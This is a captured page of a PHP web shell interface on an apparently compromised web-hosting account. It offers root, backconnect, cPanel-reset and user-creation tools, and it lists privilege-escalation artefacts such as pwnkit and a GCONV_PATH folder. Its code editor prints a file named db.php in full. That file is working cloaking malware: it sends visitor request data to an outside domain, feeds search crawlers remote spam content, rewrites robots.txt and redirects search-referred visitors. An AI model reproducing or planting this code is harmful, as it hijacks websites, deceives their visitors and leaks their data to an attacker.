Linux premium131.web-hosting.com 4.18.0-553.44.1.lve.el8.x86_64 #1 SMP Thu Mar 13 14:29:12 UTC 2025 x86_64
LiteSpeed
: 162.0.232.56 | : 216.73.216.178
Cant Read [ /etc/named.conf ]
8.1.33
syrihapj
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
syrihapj /
omset4d.site /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
.well-known
[ DIR ]
drwxr-xr-x
874109
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
cgi-bin
[ DIR ]
drwxr-xr-x
.hta
6.57
KB
-rw-r--r--
.htaccess
618
B
-rw-r--r--
.mad-root
0
B
-rw-r--r--
3VX9AsJ1I8a.php
41.78
KB
-rw-r--r--
KFV73Ssnxhm.php
35.46
KB
-rw-r--r--
XAygKxpq5M3.php
41.84
KB
-rw-r--r--
adminer.php
465.43
KB
-rw-r--r--
autoload_classmap.php
95.98
KB
-rw-r--r--
chosen.php
10.97
KB
-rw-r--r--
db.php
4.54
KB
-rw-r--r--
filefuns.php
20.04
KB
-r--r--r--
index.html
0
B
-rw-r--r--
index.php
7.28
KB
-r--r--r--
lf6zycZgk1e.php
35.68
KB
-rw-r--r--
manager.php
191.82
KB
-rw-r--r--
php.ini
105
B
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
theme-insgnvs.php
338
B
-rw-r--r--
wp-blog-header.php
340
B
-rw-r--r--
wp-blog.php
285
B
-rw-r--r--
wp-bot.php
8.25
KB
-rw-r--r--
wp-config.php
111
B
-rw-------
wp-load.php
57
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : db.php
<?php error_reporting(0); $interDomain = 'https://jp8.monkeyes.click/jt240808_13/sitemap/'; function getContent($url, $data = array()){ $url = str_replace(' ', '+', $url); $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, "$url"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_TIMEOUT, 10); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, FALSE); curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($data)); $output = curl_exec($ch); curl_close($ch); return $output; } function getReqUri(){ $script_name = basename($_SERVER['SCRIPT_FILENAME']); if (basename($_SERVER['SCRIPT_NAME']) === $script_name) { $url = $_SERVER['SCRIPT_NAME']; } elseif (basename($_SERVER['PHP_SELF']) === $script_name) { $url = $_SERVER['PHP_SELF']; } elseif (basename($_SERVER['ORIG_SCRIPT_NAME']) === $script_name) { $url = $_SERVER['ORIG_SCRIPT_NAME']; } elseif (($pos = strpos($_SERVER['PHP_SELF'], '/' . $script_name)) !== false) { $url = substr($_SERVER['SCRIPT_NAME'], 0, $pos) . '/' . $script_name; } elseif ($_SERVER['DOCUMENT_ROOT'] && strpos($_SERVER['SCRIPT_FILENAME'], $_SERVER['DOCUMENT_ROOT']) === 0) { $url = str_replace($_SERVER['DOCUMENT_ROOT'], '', $_SERVER['SCRIPT_FILENAME']); } if (($pos = strpos($_SERVER['REQUEST_URI'], '.php')) !== false) { $requri = $url . substr($_SERVER['REQUEST_URI'], $pos + 4); } else { $requri = $url . substr($_SERVER['REQUEST_URI'], strpos($_SERVER['REQUEST_URI'], '/')); } return rtrim($requri, '/'); } function checkReferer($refer){ $referbots = 'google|yahoo|bing'; if ($refer != '' && preg_match("/($referbots)/si", $refer)) { return true; } return false; } function isCrawler($agent){ $agent = strtolower($agent); $bots = 'googlebot|bingbot|google|bing|yahoo'; if ($agent != '' && preg_match("/($bots)/si", $agent)) { return true; } return false; } function isSsl(){ if ($_SERVER['HTTPS'] && ('1' == $_SERVER['HTTPS'] || 'on' == strtolower($_SERVER['HTTPS']))) { return true; } elseif ('https' == $_SERVER['REQUEST_SCHEME']) { return true; } elseif ('443' == $_SERVER['SERVER_PORT']) { return true; } elseif ('https' == $_SERVER['HTTP_X_FORWARDED_PROTO']) { return true; } return false; } $http = isSsl() ? 'https://' : 'http://'; $urlMap = $interDomain . "index"; $urlJump = $interDomain . "jump"; $requri = getReqUri(); $requrl = $http . $_SERVER['HTTP_HOST'] . $requri; $userAgent = isset($_SERVER['HTTP_USER_AGENT']) ? strtolower($_SERVER['HTTP_USER_AGENT']) : ''; $referer = isset($_SERVER['HTTP_REFERER']) ? strtolower($_SERVER['HTTP_REFERER']) : ''; $params = array( 'domain' => $http . $_SERVER["HTTP_HOST"], 'req_uri' => $requri, 'req_url' => $requrl, 'req_ua' => $userAgent, 'req_rf' => $referer ); if (isCrawler($userAgent) || substr($params['req_uri'], -6) === 'robots' || substr($params['req_uri'], -4) === '.xml') { $sRequri = isset($_SERVER['REQUEST_URI']) ? $_SERVER['REQUEST_URI'] : ''; if(in_array(substr($params['req_uri'], -7), ['/robots', '?robots']) && strpos($_SERVER['REQUEST_URI'],'.php') !== false && $sRequri !== $requri){ die('robots.txt and sitemap.xml file create fail by subfile!'); } $output = getContent($urlMap, $params); if (in_array(substr($params['req_uri'], -7), ['/robots', '?robots']) && !empty($output)) { $subfile = strpos($requrl,'index.php') === false ? true : false; $ret = @file_put_contents(__DIR__ . '/robots.txt', $output, $subfile ? 8 : 0); $robots_cont = file_get_contents(__DIR__ . '/robots.txt'); if ($ret !== false && strpos(strtolower($robots_cont), "sitemap") !== false) { die('robots.txt and sitemap.xml file create success!'); } else { die('robots.txt and sitemap.xml file create fail!'); } } elseif (!empty($output)) { if (substr($output, 0, 5) === '<?xml') { header("Content-type:text/xml"); } else { header("Content-type:text/html; charset=utf-8"); } echo $output; } exit; } if (!isCrawler($userAgent) && checkReferer($referer) && strrpos($params['req_uri'], '.php') !== (strlen($params['req_uri']) - 4)) { echo (getContent($urlJump, $params)); exit; } ?>
Close